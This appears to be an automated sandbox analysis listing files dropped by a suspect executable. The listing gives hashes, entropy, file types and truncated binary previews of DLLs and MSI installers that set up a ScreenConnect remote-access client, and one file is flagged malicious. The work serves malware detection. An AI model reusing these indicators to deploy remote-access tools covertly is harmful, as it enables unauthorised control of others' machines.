                                                              SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
                                                              MD5:1CF2352B684EF57925D98E766BA897F2
                                                              SHA1:6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
                                                              SHA-256:43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
                                                              SHA-512:9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
                                                              Malicious:true
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):746
                                                              Entropy (8bit):5.349174276064173
                                                              Encrypted:false
                                                              SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
                                                              MD5:ED994980CB1AABB953B2C8ECDC745E1F
                                                              SHA1:9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
                                                              SHA-256:D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
                                                              SHA-512:61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
                                                              Malicious:false
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                              Category:dropped
                                                              Size (bytes):1086792
                                                              Entropy (8bit):7.793516535218678
                                                              Encrypted:false
                                                              SSDEEP:24576:4UUGG/qSDceVjLHGeRdtRiypAxiK7cl72km/4aoczU:bG/XcW32gqkAfosU
                                                              MD5:30CA21632F98D354A940903214AE4DE1
                                                              SHA1:6C59A3A65FB8E7D4AD96A3E8D90E72B02091D3F4
                                                              SHA-256:4BB0E9B5C70E3CAEB955397A4A3B228C0EA5836729202B8D4BA1BE531B60DAFC
                                                              SHA-512:47509F092B089EB1FFC115643DCDFBFAC5F50F239DE63ECAD71963EC1D37FF72B89F5A2AEA137ED391BA9BA10947ABBE6103DB1C56032FD6B39A0855CB283509
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):234
                                                              Entropy (8bit):4.977464602412109
                                                              Encrypted:false
                                                              SSDEEP:6:JiMVBdTMkIffVymRMT4/0xC/C7VrfC7VNQpuAW4QIT:MMHd413VymhsS+Qg93xT
                                                              MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                                              SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                                              SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                                              SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                                              Malicious:false
                                                              Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):49152
                                                              Entropy (8bit):4.62694170304723
                                                              Encrypted:false
                                                              SSDEEP:768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
                                                              MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                                              SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                                              SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                                              SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):36864
                                                              Entropy (8bit):4.340550904466943
                                                              Encrypted:false
                                                              SSDEEP:384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
                                                              MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                                              SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                                              SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                                              SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):57344
                                                              Entropy (8bit):4.657268358041957
                                                              Encrypted:false
                                                              SSDEEP:768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
                                                              MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                                              SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                                              SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                                              SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):176128
                                                              Entropy (8bit):5.775360792482692
                                                              Encrypted:false
                                                              SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                              MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                              SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                              SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                              SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):548864
                                                              Entropy (8bit):6.031251664661689
                                                              Encrypted:false
                                                              SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                              MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                              SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                              SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                              SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):11776
                                                              Entropy (8bit):5.267782165666963
                                                              Encrypted:false
                                                              SSDEEP:192:TY8/Qp6lCJuV3jnXtyVNamVNG1YZfCrMmbfHJ7kjvLQbuLd9NEFbOhmX:Z/cBJaLXt2NaheUrMmb/FkjvLQbuZZmX
                                                              MD5:5060FA094CE77A1DB1BEB4010F3C2306
                                                              SHA1:93B017A300C14CEEBA12AFBC23573A42443D861D
                                                              SHA-256:25C495FB28889E0C4D378309409E18C77F963337F790FEDFBB13E5CC54A23243
                                                              SHA-512:2384A0A8FC158481E969F66958C4B7D370BE4219046AB7D77E93E90F7F1C3815F23B47E76EFD8129234CCCB3BCAC2AA8982831D8745E0B733315C1CCF3B1973D
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m............." ..0..&..........&E... ...`....... ..............................t.....@..................................D..O....`..............................$D..8............................................ ............... ..H............text...,%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H........'.......................C........................................(....*^.(.......&...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s.......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~..........s....%......(...+%-.&+.(...........s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1721856
                                                              Entropy (8bit):6.639136400085158
                                                              Encrypted:false
                                                              SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                              MD5:9F823778701969823C5A01EF3ECE57B7
                                                              SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                              SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                              SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                              Process:C:\Users\user\Desktop\file.exe
                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {C65824D8-9903-AFB4-B430-141024FF968F}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                              Category:dropped
                                                              Size (bytes):13377536
                                                              Entropy (8bit):7.965045236153816
                                                              Encrypted:false
                                                              SSDEEP:196608:e53JLR3LGMLiW35V53JLR3LGMLL53JLR3LGMLW53JLR3LGMLl53JLR3LGML453Ju:STiuvTRTaT/TITCT7
                                                              MD5:70AE0D4F424B0E3F1C348FCD65B24508
                                                              SHA1:7734ACD61F9EE7441436E0BC549F92BEF0D7C238
                                                              SHA-256:4B17A0972E2C4E7275AE538839E35E6CBD2906E4DEFD7D94CECA2EDF3ADF1BD3
                                                              SHA-512:8A6D042FA031023C0BC855451780A70C6ED9DEA8951912F47AB72361522ADDD55ED6F4471C8C0E835857A9D2A00DDCB3891238D11B2BCEDFDD480A8BA9172B55
                                                              Malicious:false
                                                              Preview:......................>.......................................................{...f...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {C65824D8-9903-AFB4-B430-141024FF968F}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                              Category:dropped
                                                              Size (bytes):13377536
                                                              Entropy (8bit):7.965045236153816
                                                              Encrypted:false
                                                              SSDEEP:196608:e53JLR3LGMLiW35V53JLR3LGMLL53JLR3LGMLW53JLR3LGMLl53JLR3LGML453Ju:STiuvTRTaT/TITCT7
                                                              MD5:70AE0D4F424B0E3F1C348FCD65B24508
                                                              SHA1:7734ACD61F9EE7441436E0BC549F92BEF0D7C238
                                                              SHA-256:4B17A0972E2C4E7275AE538839E35E6CBD2906E4DEFD7D94CECA2EDF3ADF1BD3
                                                              SHA-512:8A6D042FA031023C0BC855451780A70C6ED9DEA8951912F47AB72361522ADDD55ED6F4471C8C0E835857A9D2A00DDCB3891238D11B2BCEDFDD480A8BA9172B55
                                                              Malicious:false
                                                              Preview:......................>.......................................................{...f...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {C65824D8-9903-AFB4-B430-141024FF968F}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                              Category:dropped
                                                              Size (bytes):13377536
                                                              Entropy (8bit):7.965045236153816
                                                              Encrypted:false
                                                              SSDEEP:196608:e53JLR3LGMLiW35V53JLR3LGMLL53JLR3LGMLW53JLR3LGMLl53JLR3LGML453Ju:STiuvTRTaT/TITCT7
                                                              MD5:70AE0D4F424B0E3F1C348FCD65B24508
                                                              SHA1:7734ACD61F9EE7441436E0BC549F92BEF0D7C238
                                                              SHA-256:4B17A0972E2C4E7275AE538839E35E6CBD2906E4DEFD7D94CECA2EDF3ADF1BD3
                                                              SHA-512:8A6D042FA031023C0BC855451780A70C6ED9DEA8951912F47AB72361522ADDD55ED6F4471C8C0E835857A9D2A00DDCB3891238D11B2BCEDFDD480A8BA9172B55
                                                              Malicious:false
                                                              Preview:......................>.......................................................{...f...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):423875
                                                              Entropy (8bit):6.5775294319822635
                                                              Encrypted:false
                                                              SSDEEP:6144:XuH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqvCl:XuH2anwohwQUv5uH2anwohwQUv8
                                                              MD5:084DB1ECADE8641008BB36B5920A9DCB
                                                              SHA1:4846BAAC94475D9B607EA91111AA12E87ACE9835
                                                              SHA-256:9700DFDD112E697300931B136B3414F4C5A7B2265999B82E116459B001B940AB
                                                              SHA-512:546A89AFB7929674A5C8E83814546643FAC8A553B4C240D47E77B14248C7A05C53C860BA60DA4049C5F380BB3E46322C3492B9655ED3DCB5546EE22AE497E77C
                                                              Malicious:false
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSIE7CB.tmp, Author: Joe Security
                                                              Preview:...@IXOS.@.....@.$qY.@.....@.....@.....@.....@.....@......&.{C65824D8-9903-AFB4-B430-141024FF968F}'.ScreenConnect Client (e6cb77284cf765aa)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{C65824D8-9903-AFB4-B430-141024FF968F}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (e6cb77284cf765aa)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{F7DC6ACE-2599-29C8-925C-5B3ACC994D1F}^.C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{E75F3825-615D-A6C3-18A8-A81116BE1B2A}f.C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{1D30660B-8729-B08B-2523-3D6361F833F5}c.C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe.@.......@.
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):207360
                                                              Entropy (8bit):6.573348437503042
                                                              Encrypted:false
                                                              SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                              MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                              SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                              SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                              SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):207360
                                                              Entropy (8bit):6.573348437503042
                                                              Encrypted:false
                                                              SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                              MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                              SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                              SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                              SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):1.162064330514013
                                                              Encrypted:false
                                                              SSDEEP:12:JSbX72FjyqcAGiLIlHVRpMh/7777777777777777777777777vDHFz3eAlp3Xl0G:JTcQI5cReo6F
                                                              MD5:F68017F50CB23A3D035022263684A99B
                                                              SHA1:3B1CB306A979A95692B880237BE891B5EAAB67AB
                                                              SHA-256:1C9610A2A17EA9B849027AAD5576D6976B851A74E37DC57A79434F531D008917
                                                              SHA-512:802FBF5AE7C00974D490C5AA6BB1C2F83CBC00A70ED8234803781226BEB4D4AF6B39F3462D541BCF02E6376B61E8C2107547A2BA4431AF28CE9687812E72EABB
                                                              Malicious:false
                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):1.8043005070624267
                                                              Encrypted:false
                                                              SSDEEP:48:j8PhpuRc06WX4EnT5/nd+qcq56AdujSifLgHW9dLDzV4xMygcuNoXSqfv+r2Adu8:Khp10nTzbpifTgHqdfqHgcNv9
                                                              MD5:6ABD73E50893FAFFCA4C15B16748C1C0
                                                              SHA1:082ED09595D4569CF22FEC4FA1FF840F229149DC
                                                              SHA-256:4B3597871B4508D1F46A08FCA672E8938F3157A0CAFB89302E1FEE0325765F73
                                                              SHA-512:4F20EE3A9CE1B37E5C74797DF77DBCDAE24646D409B75A959060A2653223314C9D6C6799256D7F8FC3666712CB71F5D125547FD29AA8F5FCCC292DF7166793E5
                                                              Malicious:false
                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
                                                              Category:dropped
                                                              Size (bytes):435
                                                              Entropy (8bit):5.289734780210945
                                                              Encrypted:false
                                                              SSDEEP:12:Kvv/7tghWPjScQZ/Ev/739Jgh5TZYR/v/71XfghNeZ:QOZZq9JOz0dONeZ
                                                              MD5:F34D51C3C14D1B4840AE9FF6B70B5D2F
                                                              SHA1:C761D3EF26929F173CEB2F8E01C6748EE2249A8A
                                                              SHA-256:0DD459D166F037BB8E531EB2ECEB2B79DE8DBBD7597B05A03C40B9E23E51357A
                                                              SHA-512:D6EEB5345A5A049A87BFBFBBBEBFBD9FBAEC7014DA41DB1C706E8B16DDEC31561679AAE9E8A0847098807412BD1306B9616C8E6FCFED8683B4F33BD05ADE38D1
                                                              Malicious:false
                                                              Preview:..............z...6... ..............00..........0....PNG........IHDR.............(-.S....PLTE....22.u......tRNS.@..f..."IDATx.c` .0"...$.(......SC..Q8....9b.i.Xa.....IEND.B`..PNG........IHDR... ... .....I......PLTE....22.u......tRNS.@..f...(IDATx.c`...... ... D.......vb.....A`..(.-s...q....IEND.B`..PNG........IHDR...0...0.....m.k.....PLTE....22.u......tRNS.@..f...+IDATx.c` .......Q...S.@..DQu...4...(.}DQD...3x........IEND.B`.
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):360001
                                                              Entropy (8bit):5.362983403783725
                                                              Encrypted:false
                                                              SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauY:zTtbmkExhMJCIpEl
                                                              MD5:BF8E7F1BB82C608161194EF90EBAE266
                                                              SHA1:3D33F7238F4D1A9981933E25C7F426999EC4EF07
                                                              SHA-256:FFC3083E99911B342183FDB71AA62C49A4B3270AA54C07666AD57C4A2531BCA7
                                                              SHA-512:1E34A65E069343E08563DF6D5572007A27D2E8EA0EB88107B95B95452CBCD0605613ADAA303DDFCEDC602D496663AEDEE1FFE0A214C77D9C1629F4404B73F2B1
                                                              Malicious:false
